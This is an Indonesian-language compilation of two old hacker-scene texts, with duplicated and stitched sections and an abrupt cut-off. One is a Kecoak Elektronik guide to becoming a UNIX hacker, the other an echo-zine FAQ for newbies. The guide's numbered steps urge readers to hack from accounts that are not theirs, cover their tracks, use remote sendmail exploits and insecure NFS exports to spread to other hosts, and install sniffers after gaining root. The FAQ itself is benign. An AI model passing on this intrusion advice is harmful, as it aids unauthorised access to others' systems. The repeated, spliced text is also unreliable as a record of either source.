[12] Instal sebuah sniffer jika keadaan sistem memungkinkan dan kamu membobol account 'root'!
Account ini akan memperbolehkan kamu mengakses banyak account ke host-host baru. Jalankan
skrip-skrip eksploit kamu. pada akhirnya paling tidak ada beberapa yang bisa digunakan.
Lanjutkanlah.
Menjadi seorang Hacker
APPPA? Kamu udah berhasil nge-hack root di beberapa sistem - dan kamu masih belum juga seorang
"hacker"? Kenapa tuh? Seorang hacker bukanlah seseorang yang kerjanya menge-hack sebuah site, install
sebuah sniffer dan selanjutnya. Seorang hacker asli adalah seseorang yang ingin mengerti sebuah sistem,
mengetahui bagaimana sang sistem bereaksi, bersenang-senang mengambil alih kekuasaan di server tersebut
dan tertarik dalam menemukan bugs-bugs baru dan mengarang program-program kegunaan (tool utility) baru.
Yang cocok digambarkan diatas bisa dipanggil Columbus-nya Cyberspace.
[13[ Cobalah untuk berhubungan dengan hacker-hacker lainnya dan saling bertukar informasi, pengalaman,
accounts, eksploits, dan file.
[14] Amati diskusi-diskusi di newsgroups, mailing lists, dan irc. Cobalah membaca RFC-RFC penting,
pelajarilah C dan mulailah memprogram tools karyamu sendiri.
[15] Jangan kut-ikutan menjadi "31337" - kamu sendiri tahu bahwa kamu udah cukup keren hackingnya
("cool", gitu, bahasa Sunda-nya mah!) dan kamu nggak perlu untuk meyakinkan setiap orang bahwa
kamu emang elit. Bertindaklah secara normal dan tolonglah orang-orang lain yang sekarang
bertanya-tanya kepada kamu "gimana caranya supaya gue bisa nge-hack UNIX?"
[16] Jangan lelah. Tetaplah bertahan di kawasan per-hacking-an, selalu amati newsgroup dan mailing
list dan teman teman, jangan berhenti ber-hacking ria.
Yah, segitulah dari kami, kawan-kawan, teks diatas kayaknya cukup untuk membuat para pendatang baru
tersedak mulutnya. Teks tsb emang singkat dan kotor, namun mempunyai apa yang diperlukan.
Ciao...
LithErr
referensi :
Terbitan Online Kecoak Elektronik
http://k-elektronik.org
Oleh: LithErr - LithiumError (Kecoak Elektronik
Jadi kamu memutuskan untuk menjadi seorang hacker UNIX tapi kami nggak tau gimana mulainya?
Sebelum kamu benar-benar mulai, pastikan bahwa hal-hal berikut ini adalah jelas:
(Pastikan juga bahwa kamu mengerti, bahwa tidak ada satupun anggota 'Kecoak' yang mengklaim
diri sebagai 'hackers'. Bagi kami yang terpenting adalah eksplorasi dan eksploitasi, *grins*
[1] Hacking adalah kerja keras. Hacking bukanlah tempat bermain anak-anak yang hanya ingin
mendapat 15 menit secara cuma-cuma. Kamu harus belajar bagaimana caranya mengoperasikan
dan memprogram sebuah system. Kamu mesti ngeriset bagaimana mesin-mesin bereaksi dan
membaca kode-kode asli. Ini adalah proses yang panjang dan sukar - inilah peringatan
untuk kamu!
[2] Hacking adalah ilegal. Masuk ke jaringan komputer tanpa izin adalah ilegal, paling tidak
di banyak negara (hanya Belanda dan Argentina kalo nggak salah yang belum punya hukum
mengenai hacking. Belum aja, sih ... paling juga nanti akan ada.) Walaupun hanya log-on
ke sebuah sustem dengan menggunakan account bukan milikmu adalah tindakan pidana yang bisa
dikenakan hukuman. Sekali sang hakim menjatuhkan hukuman, maka hukuman tersebut akan
dimasukkan ke data hidup / arsip kamu. Seluruh hidup kamu mungkin bisa terlantar karena
hanya sedikit perusahaan yang bersedia menerima hacker sebagai karyawan. Ini serius.
Apalagi di Indonesia. Jika kamu meng-hacking server milik pemerintah, bisa dijamin kamu akan
amblas. Dan keluarga kamu nggak aman! Beberapa anggota kami nggak bisa balik lagi ke tanah
air karena sudah dicekal, dan terakhir, pemerintah mulai menyelidiki asal-usul ChiKo dan
mencari keluarganya di Indonesia.
[3] Hacking memerlukan banyak waktu. Kamu nggak mungkin cuman nge-hack selama setengah thun,
terus berhenti dan istirahat selama tiga bulan, lalu kembali lagi. Waktu berjalan cepat di
internet. Rilis baru UNIX, bug-bug baru, dan juga fix-fix nya. Sekali kamu ketinggalan jaman
dengan eksploit data milikmu, kamu mesti mengemis-ngemis ke orang lain untuk memberikan
barang-barang baru kepadamu, dan jika kamu melakukan hal tsb terlalu sering, mereka nggak
akan begitu senang jadinya. 50% dari waktu hacking sebenarnya dihabiskan untuk mengumpulkan
informasi. Bicaralah ke hacker-hacker lainnya, baca mailing lists dan newsgroups, jangan lupa
situs-situs www dan ftp yang bagus.
Tapi apa motivasi kamu untuk secara benar-benar melakukan 'unix hacking'? Itu terserah kamu. Kamu
ingin menjadi salah satunya, maka pikirkan lagi mengapa kamu ingin menjadi salah satu unix hacker.
Lupakan film-film seperti "The Net" ataupun "Hackers" - film-film tsb BUKANLAH realita! Lupakan
mimpi-mimpi menjadi pahlawan, mengehack Pentagon atau HanKam dan menjadi cowok terseksi, mendapat
pacar-pacar yang cantik dan pada akhirnya bekerja untuk sebuah perusahaan keamanan sistem dengan gaji
berjibun ;o). Hal-hal tersebut BUKANLAH apa yang akan terjadi - jadi, pastikanlah bahwa alasan kamu
jelas, mengapa kamu ingin menjadi hacker dan apa yang kamu harapkan dari hacking. Bisakah kamu
bayangkan ibundamu tercinta, tersedu-sedu saat polisi datang untuk menahanmu?
Ingatlah peringatan-peringatan ini. Ini kami jadikan peringatan untuk memastikan bahwa kamu
menyadari apa yang kamu lakukan dan kamu ingin menjadi apa.
Catatan juga bahwa kami menulis petunjuk singkat ini sebab seringkali kami mendapat pertanyaan
dari banyak orang, "Gimana caranya supaya gue jadi jago nge-hack UNIX?" - dan dari waktu ke waktu
kami menjadi makin cape ngejawabinnya. Maka ... inilah dia jawaban-jawabannya. Jangan salahkan
kami atas ketidaklengkapan ataupun kesalahan- kami udah nggak peduli lagi dengan permintaan-permintaan
ngajarin nge-hack lewat jalan potong. Hanya yang paling tahan bantinglah yang bertahan - jadi,
cobalah mendapatkan sebanyak mungkin melalui teks ini jika kamu benar-benar masih pemula. Kami
sendiri masih belum pantas menyandang gelar "hacker" karena kami merasa masih jauh sekali tertinggal
oleh rekan-rekan kebangsaan lain dan kami masih selalu dalam proses mempelajari segalanya.
Gimana cara mulainya
[1] Kenalilah sang sistem - atau - gimana caranya kamu bisa menang rodeo tanpa belajar
caranya menunggang kuda?
[2] Dapatkan distribusi unix. Cobalah mendapatkan Linux, FreeBSD, Solaris, Sinix dll. untuk PC
kamu. Linux dan FreeBSD adalah sistem-sistem murah (kadang-kadang gratis!) yang berasal dari
BSD, sedangkan Solaris dan Sinix adalah sistem-sistem mahal yang berasal dari System V.
Tip: Carilah distribusi linux yang punya buku pegangan yang cukup bagus. Kamu mesti mempelajari
bagaimana caranya mengoperasikan unix. Pelajarilah dasar-dasarnya, seperti mengganti direktori,
perintah-perintah menyalin dan menghapus dan menggunakan program penyunting.
[3] Motivasi dirimu sendiri untuk secara benar-benar menggunakan UNIX. Gimana caranya memotivasi
- itu terserah kamu sendiri. Mungkin dengan menggunakan databasi yang ada di distribusi unix
kamu, membuat program dalam C untuk sekolah/universitas kamu, apa aja lah, yang jelas kamu
mesti benar-benar menggunakan unix (seperti jamannya ngetik perintah di DOS dulu).
[4] Beli beberapa buku untuk menolong kamu. Diluar sana ada banyak, jadi, pergilah ke toko buku
terkemuka, paling bagus didekat sebuah universitas, dimana banyak orang-orang yang bisa menolong
memberitahukan buku-buku apa yang cukup baik mengenai unix. Buku-buku Nutshell terbitan O'reilly
(dan terjemahannya) kami sukai, namun ini adalah opini pribadi. Kamu mungkin mau mulai dengan
seri For Dummies terbitan IDG (banyak yang bahasa Indonesianya. Baca FAQ untuk judul-judul lain.
[5] Dapatkan internet account dengan PPP dan/atau akses shell (hubungi ISPmu). JANGAN SEKALI-KALI
menge-hack atau bertukar informasi mengenai hacking (tanpa PGP) dengan menggunakan account milik
kamu sendiri (atau account dibawah nama/alamat/telepon kamu!). Coba untuk mengkonfigurasikan PC
unix kamu untuk menghubungkan diri ke Internet provider. Beberapa distribusi Linux dilengkapi
dengan sebuah buku petunjuk dimana mereka menggambarkan gimana caranya untuk menyambungkan ke
internet. Jika kamu sudah mengikuti 5 langkah tsb diatas dan mengetahui caranya mengoperasikan
unix (ini akan makan waktu sekitar 2 - 8 minggu) maka kamu sebaiknya melanjutkan ke langkah
berikutnya:
Pelajari Dasar-Dasarnya!
[6] Kembalilah ke toko buku, kali ini carilah buku-buku mengenai unix dan keamanan internet.
Beberapa buku terbitan Elex Media membahas hal ini. Buku-buku berbahasa inggris antara lain
"Practical Unix Security" oleh Garfinkel and Spafford. Pelajari masalah-masalah keamanan dasar,
'holes' dan ciri-ciri apa yang ada di unix, dan kesalahan-kesalahan apa yang sering orang-orang
lakukan.
[7] Cobalah untuk mendapatkan semua informasi dan file-file yang kamu bisa temukan di internet.
Selidiki situs-situs www dan ftp dan gunakan mesin pencari. Berlangganlah ke mailing list mengenai
keamanan yang cukup penting dan bacalah newsgroups yang mungkin bisa jadi penting. Tanya-tanya
di sekeliling di IRC mengenai situs-situs yang bagus. berikut adalah situs-situs untuk permulaan:
http://underground.org
ftp://onyx.infonexus.com/
(*Catatan editor: karena tulisan ini ditulis sekitar tahun 1997
dan kedua situs tersebut sudah tidak aktif, makan silahkan
kunjungi situs berikut -- scut*)
http://wks.uts.ohio-state.edu/unix_course/unix.html
http://www.mcsr.olemiss.edu/unixhelp/
Dan tentu saja link-link di "Kecoak Elektronik" ;-)
bugtraq mailing list ->
http://www.securityfocus.com/archive/1
[8] Baca dan analisa file-file hasil kumpulan kamu - dan jangan cuman dikumpulin aja.
Jika kata-kata seperti suid, buffer overflow, firewall, rdist, nis, nfs, dan SATAN sudah menjadi bukan
rahasia lagi bagi kamu dan kamu benar-benar mengetahui apa makna dan konsekwensi kata-kata tersebut,
...lanjutkan.
Mulai Hacking
[9] Dapatkan sebuah account yang bukan milikmu! Coba minta dari hacker yang kamu kenal/jumpai.
Atau gunakan metode-metode yang ada di FAQ. Ingatlah: jangan coba-coba nge-hack dari account
milik kamu sendiri!
[10] Dengan account ini kamu bisa mencoba untuk menge-hack sistem pertamamu. Coba eksploit-
eksploitmu. Tapi ingatlah untuk selalu untuk menutupi jejak (artikel akan segera menyusul)
supaya account ilegal milikmu tidak menjadi sejarah setelah baru sekali dipakai!
[11] Gunakan ypx, eksploit - eksploit remote sendmail, insecure NFS exports, dll untuk mendapatkan
host-host lainnya. Kamu bisa menjadi benar-benar sukses dengan barang "lama" ini jika kamu
menggunakan daftar host yang cukup besar dan skrip tulis/temukan (write/find) yang
mengotomatisasi proses penge-test-an untuk kamu. Tapi dimana bisa ditemukan nama-nama host
untuk membuat daftar host? Banyak kemungkinan. Coba irc, /etc/hosts, www, data analisis
statistik dari akses-akses internet atau www, dll. Ini akan memberikan kamu banyak host dengan
account-account yang ada.
[12] Instal sebuah sniffer jika keadaan sistem memungkinkan dan kamu membobol account 'root'!
Account ini akan memperbolehkan kamu mengakses banyak account ke host-host baru. Jalankan
skrip-skrip eksploit kamu. pada akhirnya paling tidak ada beberapa yang bisa digunakan.
Lanjutkanlah.
Menjadi seorang Hacker
APPPA? Kamu udah berhasil nge-hack root di beberapa sistem - dan kamu masih belum juga seorang
"hacker"? Kenapa tuh? Seorang hacker bukanlah seseorang yang kerjanya menge-hack sebuah site, install
sebuah sniffer dan selanjutnya. Seorang hacker asli adalah seseorang yang ingin mengerti sebuah sistem,
mengetahui bagaimana sang sistem bereaksi, bersenang-senang mengambil alih kekuasaan di server tersebut
dan tertarik dalam menemukan bugs-bugs baru dan mengarang program-program kegunaan (tool utility) baru.
Yang cocok digambarkan diatas bisa dipanggil Columbus-nya Cyberspace.
[13[ Cobalah untuk berhubungan dengan hacker-hacker lainnya dan saling bertukar informasi, pengalaman,
accounts, eksploits, dan file.
[14] Amati diskusi-diskusi di newsgroups, mailing lists, dan irc. Cobalah membaca RFC-RFC penting,
pelajarilah C dan mulailah memprogram tools karyamu sendiri.
[15] Jangan kut-ikutan menjadi "31337" - kamu sendiri tahu bahwa kamu udah cukup keren hackingnya
("cool", gitu, bahasa Sunda-nya mah!) dan kamu nggak perlu untuk meyakinkan setiap orang bahwa
kamu emang elit. Bertindaklah secara normal dan tolonglah orang-orang lain yang sekarang
bertanya-tanya kepada kamu "gimana caranya supaya gue bisa nge-hack UNIX?"
[16] Jangan lelah. Tetaplah bertahan di kawasan per-hacking-an, selalu amati newsgroup dan mailing
list dan teman teman, jangan berhenti ber-hacking ria.
Yah, segitulah dari kami, kawan-kawan, teks diatas kayaknya cukup untuk membuat para pendatang baru
tersedak mulutnya. Teks tsb emang singkat dan kotor, namun mempunyai apa yang diperlukan.
Ciao...
LithErr
referensi :
Terbitan Online Kecoak Elektronik
http://k-elektronik.org
mjdi h4ck3r by yadips (echo staff)
____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/
.OR.ID
ECHO-ZINE RELEASE
08
Author: y3dips || y3dips@echo.or.id
Online @ www.echo.or.id :: http://ezine.echo.or.id
==== F.A.Q for NEWBIES Version 1.0 ===
Intr0
-----
Tulisan ini aku buat karena aku menyadari susahnya menjadi newbie , newbie yang
nanya kesana kemari dengan harapan dapet jawaban yang jelas, tetapi malah di
kerjain, di isengin bahkan di boongin, lebih parahnya lagi kalo cuma di ajarin
cara instan, trust me ? bisa deface 1,2, 4, ... 1000 sites tidak menjadikan
kamu hacker !!! pengen terkenal ? yupe kamu berhasil !! (mohon maaf juga , jika
semua yang baca bilang kalo aku munafik,aku akuin kl aku juga pernah mendeface
,but tidak ada kata terlambat untuk menyadarinya )
Stop! jangan salah menyangka dan menuduh kalo aku sudah lebih hebat dari teman2,
dan merasa sok hebat untuk meng-gurui teman2, TIDAK! ini hanyalah apresiasi
terhadap usaha teman-teman yang mau belajar dan terus terang artikel inipun
secaragaris besar meniru artikel "HOW TO BECOME A HACKER" oleh kang "eric S R "
dan telah menyalin ulang beberapa poin penting dari artikel berlicensi GPL tsb.
Artikel inipun telah di bubuhi tambalan2 dari beberapa pertanyaan yang sering
di temui. Adapun yang aku coba lakukan adalah hanya coba mendokumentasikannya
disini dengan harapan jika ada yang memerlukannya dapat dengan mudah me-refer
ke artikel ini.
Soal Version 1.0 , aku sengaja menambahkan versi agar artikel ini tidak baku,
artinya bisa di perbaiki , dihapus, di edit, di sempurnakan sesuai dengan
masukan dari semua teman2 dan perkembangan yang terjadi nantinya .
[F.A.Q]
[0] T : Tolong Jelaskan Apa Itu HAcker ?
J : Hacker adalah: Seseorang yang tertarik untuk mengetahui secara mendalam
mengenai kerja suatu system, komputer, atau jaringan komputer."
[1] T : Maukah Anda mengajari saya cara hacking?
J : Hacking adalah sikap dan kemampuan yang pada dasarnya harus dipelajari sendiri.
Anda akan menyadari bahwa meskipun para hacker sejati bersedia membantu,
mereka tidak akan menghargai Anda jika Anda minta disuapi segala hal yang
mereka ketahui
Pelajari dulu sedikit hal. Tunjukkan bahwa Anda telah berusaha, bahwa Anda
mampu belajar mandiri. Barulah ajukan pertanyaan-pertanyaan spesifik pada
hacker yang Anda jumpai.
Jika toh Anda mengirim email pada seorang hacker untuk meminta nasihat,
ketahuilah dahulu dua hal. Pertama, kami telah menemukan bahwa orang-orang
yang malas dan sembrono dalam menulis biasanya terlalu malas dan sembrono
dalam berpikir sehingga tidak cocok menjadi hacker -- karena itu usahakanlah
mengeja dengan benar, dan gunakan tata bahasa dan tanda baca yang baik,
atau Anda tidak akan diacuhkan.
Kedua, jangan berani-berani meminta agar jawaban dikirim ke alamat email
lain yang berbeda dari alamat tempat Anda mengirim email; kami menemukan
orang-orang ini biasanya pencuri yang memakai account curian, dan kami
tidak berminat menghargai pencuri
T : Kalau begitu arahkan saya?
J : Baiklah , kamu harus belajar !!
T : Apa yang harus di pelajari ?
J : Networking (jaringan) , Programing , Sistem Operasi , Internet
T : wow, apa gak terlalu banyak tuh ?
J : Tidak, Semua itu tidak harus kamu kuasai dalam waktu cepat, basicnya yang penting
Ingat semua itu perlu proses!
T : Networking saya mulai dari mana ?
J : Pengetahuan dasar jaringan ( konsep TCP/IP) , komponen dasar jaringan, topologi
jaringan, terlalu banyak artikel yang dapat kamu baca dan buku yang bertebaran
di toko toko buku, atau kamu bisa mencoba berkunjung kesitus ilmukomputer.com
T : Untuk programing ?
J : Mungkin yang terpenting adalah 'logika' pemrograman , jadi lebih kearah
pemanfaatan logika , ada baiknya belajar algoritma , pengenalan flowchart
atau bagan alur untuk melatih logika (teoritis) serta untuk prakteknya sangat
disarankan belajar pemrograman yang masih menomer satukan logika/murni
T : Kalau begitu bahasa pemrograman apa yang harus saya pelajari awalnya?
J : Bahasa Pemrograman apapun sebenarnya sama baik, tetapi ada baiknya belajar
bahasa seperti C , Perl , Phyton, Pascal, C++ , bukan berarti
menjelek-jelekkan visual programing ( nanti kamu akan tau bedanya )
(*ini murni pengalaman pribadi)
[3] T : Bagaimana saya harus memulai programing ?
J : Kumpulkan semua dokumentasi, manual, how to , FAQ , buku , dan contoh contoh
dari bahasa pemrograman yang akan anda pelajari , Cari dan install software
yang dibutuhkan oleh bahasa tersebut (Sesuai dokumentasi) , cobalah memprogram
walaupun program yang simple, dan kamu tidak di "haramkan" untuk mengetik ulang
program contoh dengan harapan kamu akan lebih mengerti dibandingkan kamu hanya
membaca saja, cari guru, teman atau komunitas yang bisa diajak bekerja sama
dalam mempelajari bahasa tersebut ( gabung dimilis, forum khusus bahasa tsb )
, sisanya tergantung seberapa besar usaha kamu. jangan mudah menyerah apalagi
sampai putus asa.
[1] T : Apakah Visual Basic atau Delphi bahasa permulaan yang bagus?
J : Tidak, karena mereka tidak portabel. Belum ada implementasi open-source dari
bahasa-bahasa ini, jadi Anda akan terkurung di platform yang dipilih oleh vendor.
Menerima situasi monopoli seperti itu bukanlah cara hacker.
[1] T : Apakah matematika saya harus bagus untuk menjadi hacker?
J : Tidak. Meskipun Anda perlu dapat berpikir logis dan mengikuti rantai pemikiran
eksak, hacking hanya menggunakan sedikit sekali matematika formal atau aritmetika.
Anda terutama tidak perlu kalkulus atau analisis (kita serahkan itu kepada para
insinyur elektro :-)). Sejumlah dasar di matematika finit (termasuk aljabar Bool,
teori himpunan hingga, kombinasi, dan teori graph) berguna.
T : Tentang pemrograman Web , apakah harus ?
J : Yupe, dikarenakan Internet adalah dunia kamu nantinya
T : Bahasa pemrograman web apa yang sebaiknya dipelajari untuk pemula ?
J : Mungkin kamu bisa mencoba HTML, dilanjutkan ke PHP yang akan membuat kamu lebih
familiar ke programing secara penuh
T : Tentang Sistem Operasi , kenapa harus ?
J : Penguasaan terhadap suatu operating system adalah sangat penting, kenapa ?
karena itulah lingkungan kamu nantinya , perdalami cara kerja suatu operating
system , kenali dan akrabkan diri :)
T : Sebaiknya, Operating system apa yang saya perdalami?
J : mungkin kamu bisa coba linux atau BSD , selain mereka free , dukungan komunitas
juga sangat banyak sehingga kamu tidak akan di tinggal sendirian jika menemukan
masalah, dan pula kemungkinan kamu untuk dapat berkembang sangatlah besar
dikarenakan sifat "open source"
T : Untuk pemula seperti saya , apa yang harus saya gunakan ?
J : Sebaiknya jika kamu benar benar pemula, kamu bisa gunakan linux , karena baik
sistem installasinya dan Graphical User Interfacenya lebih memudahkan kamu
T : Distro apa yang sebaiknya saya gunakan dan mudah untuk pemula
J : Kamu bisa mencoba Mandrake (disarankan oleh beberapa ahli yang pernah diajak
diskusi) , tetapi kamu bisa memilih sesukamu, meskipun aku memulainya juga
dengan mandrake tetapi aku lebih comfort dengan redhat.
T : Kalau tidak bisa Menginstall linux apakah jalan saya sudah tertutup?
J : Kamu bisa mencoba menginstall vmware , cygwin atau kamu bisa menyewa shell
T : Dimana Saya bisa mendapatkan programn program tersebut
J : berhentilah bertanya , dan arahkan browser kamu ke search engine , terlalu
banyak situs penyedia jasa yang dapat membantu kamu
T : Apakah saya HArus memiliki komputer ?
Y : IYA! , kecuali kalo kamu sudah dapat berinteraksi lebih lama dengan komputer
meskipun itu bukan milik kamu, tetapi sangat baik jika memilikinya sendiri
karena , pertama : Ide yang timbul bisa setiap saat, baik programing, riset
dsb, jadi ada baiknya kamu memilikinya agar dapat langsung
menyalurkan semua ide dan pemikiran kamu
Kedua : menggunakan PC sendiri membuat kamu merasa bebas untuk
bereksplorasi dan mencoba tanpa takut merusak dsb
T : Hardware apa yang saya butuhkan ?
Y : Menginggat harga komputer sudah relatif "murah" (mohon maaf buat yang masih belum
mampu membelinya) , kamu bisa sesuaikan spesifikasinya untuk kamu gunakan
T : Internet , apakah saya harus terkoneksi ke internet?
Y : Terkadang itu perlu, tetapi jangan terlalu memaksakan , kamu memang perlu terhubung
ke internet untuk mendownload modul, bacaan, update informasi, tetapi jangan jadikan
penghalang jika kamu tidak bisa terkoneksi secara periodik, jadilah kreatif
[1] T : Berapa lama waktu yang saya butuhkan?
J : Masalah waktu itu relatif, Bergantung seberapa besar bakat dan usaha Anda.
Kebanyakan orang memperoleh keahlian yang cukup dalam delapan belas bulan
atau dua tahun, jika mereka berkonsentrasi. Tapi jangan pikir setelah itu
selesai; jika Anda hacker sejati, Anda akan menghabiskan sisa waktu belajar
dan menyempurnakan keahlian.
T : Apakah tidak bisa yang Instan ? misal Tinggal gunain tool tertentu ?
J : Hum, kamu mo jadi hacker atau cuma pemakai tools ?, kalau menggunakan tools
semua orang juga bisa!!
[1] T : Bagaimana cara mendapatkan password account orang lain?
J : Ini cracking. Pergi sana, bodoh.
[1] T : Bagaimana cara menembus/membaca/memonitor email orang lain?
J : Ini cracking. Jauh-jauh sana, goblok
[0] T : Cracker ? apa itu ?
J : Cracker adalah individu yang mencoba masuk ke dalam suatu sistem komputer
tanpa ijin (authorisasi), individu ini biasanya berniat jahat/buruk, sebagai
kebalikan dari 'hacker', dan biasanya mencari keuntungan dalam memasuki suatu
sistem
[1] T : Saya dicrack. Maukah Anda menolong saya mencegah serangan berikutnya?
J : Tidak. Setiap kali saya ditanya pertanyaan di atas sejauh ini, ternyata
penanyanya seseorang yang menggunakan Microsoft Windows. Tidak mungkin secara
efektif melindungi sistem Windows dari serangan crack; kode dan arsitektur
Windows terlalu banyak mengandung cacat, sehingga berusaha mengamankan Windows
seperti berusaha menyelamatkan kapal yang bocor dengan saringan. Satu-satunya
cara pencegahan yang andal adalah berpindah ke Linux atau sistem operasi lain
yang setidaknya dirancang untuk keamanan.
T : Apakah saya perlu komunitas ?
J : YUPE , komunitas sangat kamu perlukan, apalagi jika kamu memilih untuk berkecimpung
di dunia opensource, banyak milis yang bisa kamu ikuti, sebaiknya ikuti milis yang
spesifik sesuai dengan yang kamu gunakan. (misal linux, sesuai distro )
T : Apakah termasuk milis sekuriti ?
J : iyah ! cobalah bugtraq@securityfocus.com
ReFerensi :
[0]. *RFC1392,Internet User Glossary
[1]. How to Become A Hacker - Eric S Raymond
Terjemahan Indonesia dari How To Become A Hacker - Steven Haryanto
[2]. Ezine at http://ezine.echo.or.id
[3]. Milis Newbie_hacker@yahoogroups.com
[4]. #e-c-h-o room @t DALNET
. Pendapat pribadi , hasil diskusi, MIlis lain , forum, Chatting
*greetz to:
[echostaff : moby, comex, the_Day, z3r0byt3, K-159, c-a-s-e, S'to]
{ISICteam : yudhax, anton, balai_melayu, wisnu, biatch-X },
anak anak newbie_hacker[at]yahoogroups.com , #e-c-h-o , #aikmel
kirimkan kritik && saran ke y3dips[at]echo.or.id
*/0x79/0x33/0x64/0x69/0x70/0x73/* (c)2004
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/
.OR.ID
ECHO-ZINE RELEASE
08
Author: y3dips || y3dips@echo.or.id
Online @ www.echo.or.id :: http://ezine.echo.or.id
==== F.A.Q for NEWBIES Version 1.0 ===
Intr0
-----
Tulisan ini aku buat karena aku menyadari susahnya menjadi newbie , newbie yang
nanya kesana kemari dengan harapan dapet jawaban yang jelas, tetapi malah di
kerjain, di isengin bahkan di boongin, lebih parahnya lagi kalo cuma di ajarin
cara instan, trust me ? bisa deface 1,2, 4, ... 1000 sites tidak menjadikan
kamu hacker !!! pengen terkenal ? yupe kamu berhasil !! (mohon maaf juga , jika
semua yang baca bilang kalo aku munafik,aku akuin kl aku juga pernah mendeface
,but tidak ada kata terlambat untuk menyadarinya )
Stop! jangan salah menyangka dan menuduh kalo aku sudah lebih hebat dari teman2,
dan merasa sok hebat untuk meng-gurui teman2, TIDAK! ini hanyalah apresiasi
terhadap usaha teman-teman yang mau belajar dan terus terang artikel inipun
secaragaris besar meniru artikel "HOW TO BECOME A HACKER" oleh kang "eric S R "
dan telah menyalin ulang beberapa poin penting dari artikel berlicensi GPL tsb.
Artikel inipun telah di bubuhi tambalan2 dari beberapa pertanyaan yang sering
di temui. Adapun yang aku coba lakukan adalah hanya coba mendokumentasikannya
disini dengan harapan jika ada yang memerlukannya dapat dengan mudah me-refer
ke artikel ini.
Soal Version 1.0 , aku sengaja menambahkan versi agar artikel ini tidak baku,
artinya bisa di perbaiki , dihapus, di edit, di sempurnakan sesuai dengan
masukan dari semua teman2 dan perkembangan yang terjadi nantinya .
[F.A.Q]
[0] T : Tolong Jelaskan Apa Itu HAcker ?
J : Hacker adalah: Seseorang yang tertarik untuk mengetahui secara mendalam
mengenai kerja suatu system, komputer, atau jaringan komputer."
[1] T : Maukah Anda mengajari saya cara hacking?
J : Hacking adalah sikap dan kemampuan yang pada dasarnya harus dipelajari sendiri.
Anda akan menyadari bahwa meskipun para hacker sejati bersedia membantu,
mereka tidak akan menghargai Anda jika Anda minta disuapi segala hal yang
mereka ketahui
Pelajari dulu sedikit hal. Tunjukkan bahwa Anda telah berusaha, bahwa Anda
mampu belajar mandiri. Barulah ajukan pertanyaan-pertanyaan spesifik pada
hacker yang Anda jumpai.
Jika toh Anda mengirim email pada seorang hacker untuk meminta nasihat,
ketahuilah dahulu dua hal. Pertama, kami telah menemukan bahwa orang-orang
yang malas dan sembrono dalam menulis biasanya terlalu malas dan sembrono
dalam berpikir sehingga tidak cocok menjadi hacker -- karena itu usahakanlah
mengeja dengan benar, dan gunakan tata bahasa dan tanda baca yang baik,
atau Anda tidak akan diacuhkan.
Kedua, jangan berani-berani meminta agar jawaban dikirim ke alamat email
lain yang berbeda dari alamat tempat Anda mengirim email; kami menemukan
orang-orang ini biasanya pencuri yang memakai account curian, dan kami
tidak berminat menghargai pencuri
T : Kalau begitu arahkan saya?
J : Baiklah , kamu harus belajar !!
T : Apa yang harus di pelajari ?
J : Networking (jaringan) , Programing , Sistem Operasi , Internet
T : wow, apa gak terlalu banyak tuh ?
J : Tidak, Semua itu tidak harus kamu kuasai dalam waktu cepat, basicnya yang penting
Ingat semua itu perlu proses!
T : Networking saya mulai dari mana ?
J : Pengetahuan dasar jaringan ( konsep TCP/IP) , komponen dasar jaringan, topologi
jaringan, terlalu banyak artikel yang dapat kamu baca dan buku yang bertebaran
di toko toko buku, atau kamu bisa mencoba berkunjung kesitus ilmukomputer.com
T : Untuk programing ?
J : Mungkin yang terpenting adalah 'logika' pemrograman , jadi lebih kearah
pemanfaatan logika , ada baiknya belajar algoritma , pengenalan flowchart
atau bagan alur untuk melatih logika (teoritis) serta untuk prakteknya sangat
disarankan belajar pemrograman yang masih menomer satukan logika/murni
T : Kalau begitu bahasa pemrograman apa yang harus saya pelajari awalnya?
J : Bahasa Pemrograman apapun sebenarnya sama baik, tetapi ada baiknya belajar
bahasa seperti C , Perl , Phyton, Pascal, C++ , bukan berarti
menjelek-jelekkan visual programing ( nanti kamu akan tau bedanya )
(*ini murni pengalaman pribadi)
[3] T : Bagaimana saya harus memulai programing ?
J : Kumpulkan semua dokumentasi, manual, how to , FAQ , buku , dan contoh contoh
dari bahasa pemrograman yang akan anda pelajari , Cari dan install software
yang dibutuhkan oleh bahasa tersebut (Sesuai dokumentasi) , cobalah memprogram
walaupun program yang simple, dan kamu tidak di "haramkan" untuk mengetik ulang
program contoh dengan harapan kamu akan lebih mengerti dibandingkan kamu hanya
membaca saja, cari guru, teman atau komunitas yang bisa diajak bekerja sama
dalam mempelajari bahasa tersebut ( gabung dimilis, forum khusus bahasa tsb )
, sisanya tergantung seberapa besar usaha kamu. jangan mudah menyerah apalagi
sampai putus asa.
[1] T : Apakah Visual Basic atau Delphi bahasa permulaan yang bagus?
J : Tidak, karena mereka tidak portabel. Belum ada implementasi open-source dari
bahasa-bahasa ini, jadi Anda akan terkurung di platform yang dipilih oleh vendor.
Menerima situasi monopoli seperti itu bukanlah cara hacker.
[1] T : Apakah matematika saya harus bagus untuk menjadi hacker?
J : Tidak. Meskipun Anda perlu dapat berpikir logis dan mengikuti rantai pemikiran
eksak, hacking hanya menggunakan sedikit sekali matematika formal atau aritmetika.
Anda terutama tidak perlu kalkulus atau analisis (kita serahkan itu kepada para
insinyur elektro :-)). Sejumlah dasar di matematika finit (termasuk aljabar Bool,
teori himpunan hingga, kombinasi, dan teori graph) berguna.
T : Tentang pemrograman Web , apakah harus ?
J : Yupe, dikarenakan Internet adalah dunia kamu nantinya
T : Bahasa pemrograman web apa yang sebaiknya dipelajari untuk pemula ?
J : Mungkin kamu bisa mencoba HTML, dilanjutkan ke PHP yang akan membuat kamu lebih
familiar ke programing secara penuh
T : Tentang Sistem Operasi , kenapa harus ?
J : Penguasaan terhadap suatu operating system adalah sangat penting, kenapa ?
karena itulah lingkungan kamu nantinya , perdalami cara kerja suatu operating
system , kenali dan akrabkan diri :)
T : Sebaiknya, Operating system apa yang saya perdalami?
J : mungkin kamu bisa coba linux atau BSD , selain mereka free , dukungan komunitas
juga sangat banyak sehingga kamu tidak akan di tinggal sendirian jika menemukan
masalah, dan pula kemungkinan kamu untuk dapat berkembang sangatlah besar
dikarenakan sifat "open source"
T : Untuk pemula seperti saya , apa yang harus saya gunakan ?
